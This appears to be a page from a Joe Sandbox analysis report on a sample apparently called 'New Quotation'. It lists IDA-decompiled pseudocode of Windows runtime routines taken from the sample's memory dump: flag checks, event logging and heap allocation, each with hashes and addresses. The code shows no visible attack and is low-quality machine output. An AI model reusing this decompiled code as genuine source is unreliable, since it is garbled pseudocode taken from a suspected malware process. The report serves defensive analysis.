                                                                                                                                                                                          0x1d88d965
                                                                                                                                                                                          0x1d88d967
                                                                                                                                                                                          0x1d88d972
                                                                                                                                                                                          0x1d88d97a
                                                                                                                                                                                          0x1d88d97d
                                                                                                                                                                                          0x1d88d980
                                                                                                                                                                                          0x1d88d98b
                                                                                                                                                                                          0x1d88d99d
                                                                                                                                                                                          0x1d88d98d
                                                                                                                                                                                          0x1d88d996
                                                                                                                                                                                          0x1d88d996
                                                                                                                                                                                          0x1d88d9a8
                                                                                                                                                                                          0x1d88d9a9
                                                                                                                                                                                          0x1d88d9ab
                                                                                                                                                                                          0x1d88d9b0
                                                                                                                                                                                          0x1d88d9c3

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 587f8e7675927d9f611614d32dd2b69fe6100b362671607d2b81ebf25139d445
                                                                                                                                                                                          • Instruction ID: 79377e2399f698a6ac97a225f7780091b1adf18bd2b1366896821d9ade67aba0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 587f8e7675927d9f611614d32dd2b69fe6100b362671607d2b81ebf25139d445
                                                                                                                                                                                          • Instruction Fuzzy Hash: A301A775A10218AFDB14DFADD845FAEB7FCEF84704F014066BA00EB291DA74E901C795
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7EDD4D Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D7EDD4D(signed short* __ebx, intOrPtr __esi) {
				signed char _t16;
				signed short* _t21;
				intOrPtr _t26;
				void* _t27;

				_t26 = __esi;
				_t21 = __ebx;
				if(E1D7E3C40() != 0) {
					_t16 =  *( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a) & 0x000000ff;
				} else {
					_t16 =  *0x7ffe0384 & 0x000000ff;
				}
				if(_t16 != 0) {
					_t16 =  *[fs:0x30];
					if(( *(_t16 + 0x240) & 0x00000004) != 0) {
						if(E1D7E3C40() == 0) {
							_t16 =  *0x7ffe0385 & 0x000000ff;
						} else {
							_t16 =  *( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b) & 0x000000ff;
						}
						if((_t16 & 0x00000020) != 0) {
							_t16 = E1D850227(0x1496, _t26, 0xffffffff, 0xffffffff, _t21, _t21);
						}
					}
				}
				if( *((intOrPtr*)(_t27 - 0x24)) != _t21) {
					L7:
					return E1D80C98F(0xc0000142, 0x1496,  *((intOrPtr*)(_t27 + 8)), _t21);
				} else {
					if( *((char*)(_t27 - 0x19)) == 0) {
						if( *((intOrPtr*)(_t27 + 8)) != 1) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						L5:
						return _t16;
					}
				}
			}







                                                                                                                                                                                          0x1d7edd4d
                                                                                                                                                                                          0x1d7edd4d
                                                                                                                                                                                          0x1d7edd54
                                                                                                                                                                                          0x1d83951e
                                                                                                                                                                                          0x1d7edd5a
                                                                                                                                                                                          0x1d7edd5a
                                                                                                                                                                                          0x1d7edd5a
                                                                                                                                                                                          0x1d7edd63
                                                                                                                                                                                          0x1d83952a
                                                                                                                                                                                          0x1d839537
                                                                                                                                                                                          0x1d839544
                                                                                                                                                                                          0x1d839558
                                                                                                                                                                                          0x1d839546
                                                                                                                                                                                          0x1d83954f
                                                                                                                                                                                          0x1d83954f
                                                                                                                                                                                          0x1d839561
                                                                                                                                                                                          0x1d839574
                                                                                                                                                                                          0x1d839574
                                                                                                                                                                                          0x1d839561
                                                                                                                                                                                          0x1d839537
                                                                                                                                                                                          0x1d7edd6c
                                                                                                                                                                                          0x1d7edd7b
                                                                                                                                                                                          0x1d7edd8e
                                                                                                                                                                                          0x1d7edd6e
                                                                                                                                                                                          0x1d7edd72
                                                                                                                                                                                          0x1d7edd79
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7edd74
                                                                                                                                                                                          0x1d7edd74
                                                                                                                                                                                          0x1d7edd74
                                                                                                                                                                                          0x1d7edd74
                                                                                                                                                                                          0x1d7edd72

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: cab9439f22aac80a9cc4733bd430449799e796e932c92cec60806f45eadcd95c
                                                                                                                                                                                          • Instruction ID: 651bd0b88180af8af494e3845fc1f252998be51325d0a5fcaccd2cad7bcd9a9c
                                                                                                                                                                                          • Opcode Fuzzy Hash: cab9439f22aac80a9cc4733bd430449799e796e932c92cec60806f45eadcd95c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E016438608AD1AFE712CB6CC044BB837E9AB01BA5F0501E3E868871F1D228C880C293
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8A4CD2 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 54%
                                                                                                                                                                                          			E1D8A4CD2(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x1d8cb370 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c23;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E1D7E3C40() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push("true");
				_push(0x403);
				_push( *_t18 & 0x000000ff);
				return E1D814B50(E1D812F90(), 0x1c23, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                                                                          0x1d8a4cd2
                                                                                                                                                                                          0x1d8a4ce1
                                                                                                                                                                                          0x1d8a4ce9
                                                                                                                                                                                          0x1d8a4cf2
                                                                                                                                                                                          0x1d8a4cf5
                                                                                                                                                                                          0x1d8a4cf9
                                                                                                                                                                                          0x1d8a4cfc
                                                                                                                                                                                          0x1d8a4cff
                                                                                                                                                                                          0x1d8a4d02
                                                                                                                                                                                          0x1d8a4d05
                                                                                                                                                                                          0x1d8a4d0f
                                                                                                                                                                                          0x1d8a4d21
                                                                                                                                                                                          0x1d8a4d11
                                                                                                                                                                                          0x1d8a4d1a
                                                                                                                                                                                          0x1d8a4d1a
                                                                                                                                                                                          0x1d8a4d2c
                                                                                                                                                                                          0x1d8a4d2d
                                                                                                                                                                                          0x1d8a4d2f
                                                                                                                                                                                          0x1d8a4d34
                                                                                                                                                                                          0x1d8a4d48

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 1b2a5de08dfe064342dcd64e5ef29f313fb74b0236ccfcdd4fb18d0937c193ca
                                                                                                                                                                                          • Instruction ID: 56682494e774df52500296ed11ec977223a578f5b487397734c5e494b145f56c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b2a5de08dfe064342dcd64e5ef29f313fb74b0236ccfcdd4fb18d0937c193ca
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C011EB5A002189FDB00CFADD941ADEB7F8FF48714F11405AF504EB250D634AA018BA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8A4C59 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 54%
                                                                                                                                                                                          			E1D8A4C59(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x1d8cb370 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c22;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E1D7E3C40() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push("true");
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E1D814B50(E1D812F90(), 0x1c22, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                                                                                          0x1d8a4c59
                                                                                                                                                                                          0x1d8a4c68
                                                                                                                                                                                          0x1d8a4c70
                                                                                                                                                                                          0x1d8a4c79
                                                                                                                                                                                          0x1d8a4c7c
                                                                                                                                                                                          0x1d8a4c80
                                                                                                                                                                                          0x1d8a4c83
                                                                                                                                                                                          0x1d8a4c86
                                                                                                                                                                                          0x1d8a4c89
                                                                                                                                                                                          0x1d8a4c8c
                                                                                                                                                                                          0x1d8a4c96
                                                                                                                                                                                          0x1d8a4ca8
                                                                                                                                                                                          0x1d8a4c98
                                                                                                                                                                                          0x1d8a4ca1
                                                                                                                                                                                          0x1d8a4ca1
                                                                                                                                                                                          0x1d8a4cb3
                                                                                                                                                                                          0x1d8a4cb4
                                                                                                                                                                                          0x1d8a4cb6
                                                                                                                                                                                          0x1d8a4cbb
                                                                                                                                                                                          0x1d8a4ccf

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b2ed78d20bd0cf472498097ba82ca41c5b391af5610fc3935a86a7f8b6db0071
                                                                                                                                                                                          • Instruction ID: ebad65fcd83fac423495c855a025b3444a7346a465a4b1b54ebc58890f3a455d
                                                                                                                                                                                          • Opcode Fuzzy Hash: b2ed78d20bd0cf472498097ba82ca41c5b391af5610fc3935a86a7f8b6db0071
                                                                                                                                                                                          • Instruction Fuzzy Hash: 48011EB5A10218AFDB00CFADD945A9EB7F8EF48714F51405AF504FB290D674A901CBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FBF93 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 27%
                                                                                                                                                                                          			E1D7FBF93(intOrPtr __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _t20;
				signed int _t30;
				intOrPtr* _t33;

				_push(__ecx);
				_t20 = __edx;
				_v8 = __ecx;
				_t30 = 1 << __edx + 4;
				_t33 = E1D7E5D90(__edx + 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 8);
				if(_t33 != 0) {
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0;
					if(1 != 0) {
						E1D818F40(_t33 + 4, 0, _t30 << 2);
					}
					 *((intOrPtr*)(_v8 + _t20 * 4)) = _t33;
				}
				return _t33;
			}







                                                                                                                                                                                          0x1d7fbf98
                                                                                                                                                                                          0x1d7fbf9c
                                                                                                                                                                                          0x1d7fbf9e
                                                                                                                                                                                          0x1d7fbfa7
                                                                                                                                                                                          0x1d7fbfc1
                                                                                                                                                                                          0x1d7fbfc5
                                                                                                                                                                                          0x1d7fbfc9
                                                                                                                                                                                          0x1d7fbfcb
                                                                                                                                                                                          0x1d7fbfd0
                                                                                                                                                                                          0x1d7fbfdd
                                                                                                                                                                                          0x1d7fbfe2
                                                                                                                                                                                          0x1d7fbfe8
                                                                                                                                                                                          0x1d7fbfe8
                                                                                                                                                                                          0x1d7fbff1

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 1e10a5218078d2c3776e346541d76410ead4ae5945feded31aad0990dad08442
                                                                                                                                                                                          • Instruction ID: 202f010e9da38f80c5aae6f07ecf0bb496d84808b1078c114d2b98f3ae5fbdcf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e10a5218078d2c3776e346541d76410ead4ae5945feded31aad0990dad08442
                                                                                                                                                                                          • Instruction Fuzzy Hash: 05F0C2B2600614ABD324CF8DDC40E67B7EADBC0A90F058129A555DB320E630ED04CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80C98F Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E1D80C98F(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E1D7E3C40() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E1D7E3C40() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E1D850227(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                                                                                                                          0x1d80c996
                                                                                                                                                                                          0x1d80c998
                                                                                                                                                                                          0x1d80c9a1
                                                                                                                                                                                          0x1d848267
                                                                                                                                                                                          0x1d80c9a7
                                                                                                                                                                                          0x1d80c9a7
                                                                                                                                                                                          0x1d80c9a7
                                                                                                                                                                                          0x1d80c9af
                                                                                                                                                                                          0x1d848271
                                                                                                                                                                                          0x1d84827e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84828b
                                                                                                                                                                                          0x1d84829d
                                                                                                                                                                                          0x1d84828d
                                                                                                                                                                                          0x1d848296
                                                                                                                                                                                          0x1d848296
                                                                                                                                                                                          0x1d8482a5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80c9b8
                                                                                                                                                                                          0x1d80c9b8
                                                                                                                                                                                          0x1d80c9b8
                                                                                                                                                                                          0x1d80c9b8

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8a49d7d89f33e5bf064cc7cc815dab5f191e9a4415fd639dc17ebe174072b9c1
                                                                                                                                                                                          • Instruction ID: 3f598d67b5a8f8d00a75fcead5209559e523fe3fe3ed7937752acf443816779c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a49d7d89f33e5bf064cc7cc815dab5f191e9a4415fd639dc17ebe174072b9c1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C01F935654A98ABD3134A59D904B65BBEDFF81B50F1680A2FE148B2B1D779D800C213
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D1D50 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                                          			E1D7D1D50(void* __ecx, intOrPtr _a4, char _a8) {
				void* __esi;
				void* __ebp;
				char* _t9;
				void* _t17;
				void* _t20;
				void* _t22;
				intOrPtr _t24;

				_t18 = __ecx;
				_push(__ecx);
				_t24 = _a4;
				if(_t24 == 0 || _a8 < 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					_t9 = E1D8A4A6D(_t17, _t18, _t20, _t22, _t24);
				} else {
					_push("true");
					_push( &_a8);
					_push(5);
					_push( *((intOrPtr*)(_t24 + 0x24)));
					E1D8143A0();
					if(E1D7E3C40() != 0) {
						_t9 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t9 = 0x7ffe0386;
					}
					if( *_t9 != 0) {
						_t9 = E1D8A4E03(_t24, _a8);
					}
				}
				return _t9;
			}










                                                                                                                                                                                          0x1d7d1d50
                                                                                                                                                                                          0x1d7d1d58
                                                                                                                                                                                          0x1d7d1d5a
                                                                                                                                                                                          0x1d7d1d5f
                                                                                                                                                                                          0x1d7d1da8
                                                                                                                                                                                          0x1d7d1d76
                                                                                                                                                                                          0x1d7d1d76
                                                                                                                                                                                          0x1d7d1d7b
                                                                                                                                                                                          0x1d7d1d7c
                                                                                                                                                                                          0x1d7d1d7e
                                                                                                                                                                                          0x1d7d1d81
                                                                                                                                                                                          0x1d7d1d8d
                                                                                                                                                                                          0x1d82f9b8
                                                                                                                                                                                          0x1d7d1d93
                                                                                                                                                                                          0x1d7d1d93
                                                                                                                                                                                          0x1d7d1d93
                                                                                                                                                                                          0x1d7d1d9b
                                                                                                                                                                                          0x1d82f9c7
                                                                                                                                                                                          0x1d82f9c7
                                                                                                                                                                                          0x1d7d1d9b
                                                                                                                                                                                          0x1d7d1da5

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: bd8cdc661732ba917ba62a2b0dcfcaea88020906e3e2c107cf15261c13e6935f
                                                                                                                                                                                          • Instruction ID: 6e2ac4e112b68e634592b5acecbc4d7eb0a7a6f93eec81ab9bc0d4e067350db5
                                                                                                                                                                                          • Opcode Fuzzy Hash: bd8cdc661732ba917ba62a2b0dcfcaea88020906e3e2c107cf15261c13e6935f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5901D172E54A44AFD751CB1CE944F297398AF50B31F218282FD188B2A0D774ED40C783
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8A5D65 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 52%
                                                                                                                                                                                          			E1D8A5D65(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v66;
				char _v72;
				void* __edi;
				void* __esi;
				signed char* _t19;
				intOrPtr _t25;
				signed int _t33;

				_t30 = __edx;
				_v12 =  *0x1d8cb370 ^ _t33;
				_v40 = _v40 & 0x00000000;
				_t32 = _a12;
				_v36 = __edx;
				_v66 = 0x1c21;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E1D7E3C40() == 0) {
					_t19 = 0x7ffe0386;
				} else {
					_t19 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push("true");
				_push(0x403);
				_push( *_t19 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t25, _v12 ^ _t33, _t30, 0x1c21, _t32);
			}
















                                                                                                                                                                                          0x1d8a5d65
                                                                                                                                                                                          0x1d8a5d74
                                                                                                                                                                                          0x1d8a5d7d
                                                                                                                                                                                          0x1d8a5d82
                                                                                                                                                                                          0x1d8a5d8b
                                                                                                                                                                                          0x1d8a5d8e
                                                                                                                                                                                          0x1d8a5d92
                                                                                                                                                                                          0x1d8a5d95
                                                                                                                                                                                          0x1d8a5d98
                                                                                                                                                                                          0x1d8a5da2
                                                                                                                                                                                          0x1d8a5db4
                                                                                                                                                                                          0x1d8a5da4
                                                                                                                                                                                          0x1d8a5dad
                                                                                                                                                                                          0x1d8a5dad
                                                                                                                                                                                          0x1d8a5dbf
                                                                                                                                                                                          0x1d8a5dc0
                                                                                                                                                                                          0x1d8a5dc2
                                                                                                                                                                                          0x1d8a5dc7
                                                                                                                                                                                          0x1d8a5dda

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8f0855cde3fe4bf1c92868ccc9c0818a052aeb08812ccda51195f2736ef27509
                                                                                                                                                                                          • Instruction ID: 9cc3e9333ddf09959fdc45772c39767ec536ad96b9ee9541e2d966e36b42508b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f0855cde3fe4bf1c92868ccc9c0818a052aeb08812ccda51195f2736ef27509
                                                                                                                                                                                          • Instruction Fuzzy Hash: F7017CB1A00248DFCB00CFA9D445AEEBBF8AF48714F1140AAF500AB390D734EA01CBA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D88EE78 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                                                                          			E1D88EE78(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				void* __edi;
				void* __esi;
				signed char* _t16;
				intOrPtr _t22;
				signed int _t24;
				intOrPtr _t29;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				signed int _t33;

				_t29 = __edx;
				_v8 =  *0x1d8cb370 ^ _t33;
				_t32 = __ecx;
				_t30 =  &_v48;
				_t24 = 0xa;
				memset(_t30, 0, _t24 << 2);
				_t31 = _t30 + _t24;
				_v16 = _t32;
				_v42 = 0x1036;
				_v12 = _t29;
				if(E1D7E3C40() == 0) {
					_t16 = 0x7ffe0380;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t16 & 0x000000ff);
				return E1D814B50(E1D812F90(), _t22, _v8 ^ _t33, _t29, _t31, _t32);
			}


















                                                                                                                                                                                          0x1d88ee78
                                                                                                                                                                                          0x1d88ee87
                                                                                                                                                                                          0x1d88ee8c
                                                                                                                                                                                          0x1d88ee8e
                                                                                                                                                                                          0x1d88ee95
                                                                                                                                                                                          0x1d88ee96
                                                                                                                                                                                          0x1d88ee96
                                                                                                                                                                                          0x1d88ee9d
                                                                                                                                                                                          0x1d88eea0
                                                                                                                                                                                          0x1d88eea4
                                                                                                                                                                                          0x1d88eeae
                                                                                                                                                                                          0x1d88eec0
                                                                                                                                                                                          0x1d88eeb0
                                                                                                                                                                                          0x1d88eeb9
                                                                                                                                                                                          0x1d88eeb9
                                                                                                                                                                                          0x1d88eecb
                                                                                                                                                                                          0x1d88eecc
                                                                                                                                                                                          0x1d88eece
                                                                                                                                                                                          0x1d88eed3
                                                                                                                                                                                          0x1d88eee6

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ab77310673e853a905d9981e79e2dfe2eaaa724fc18c24a562f9669c9ccc591e
                                                                                                                                                                                          • Instruction ID: d6f8698defef6a1eecdb169b57df73e10a161d2ab09ed3477589a50224e96e25
                                                                                                                                                                                          • Opcode Fuzzy Hash: ab77310673e853a905d9981e79e2dfe2eaaa724fc18c24a562f9669c9ccc591e
                                                                                                                                                                                          • Instruction Fuzzy Hash: CAF0A475A10318AFDB05DBBDC445AAEB7B8EF44710F01849AF511EB2D0DA74E9058751
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7C7917 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                          Download Yara Rule
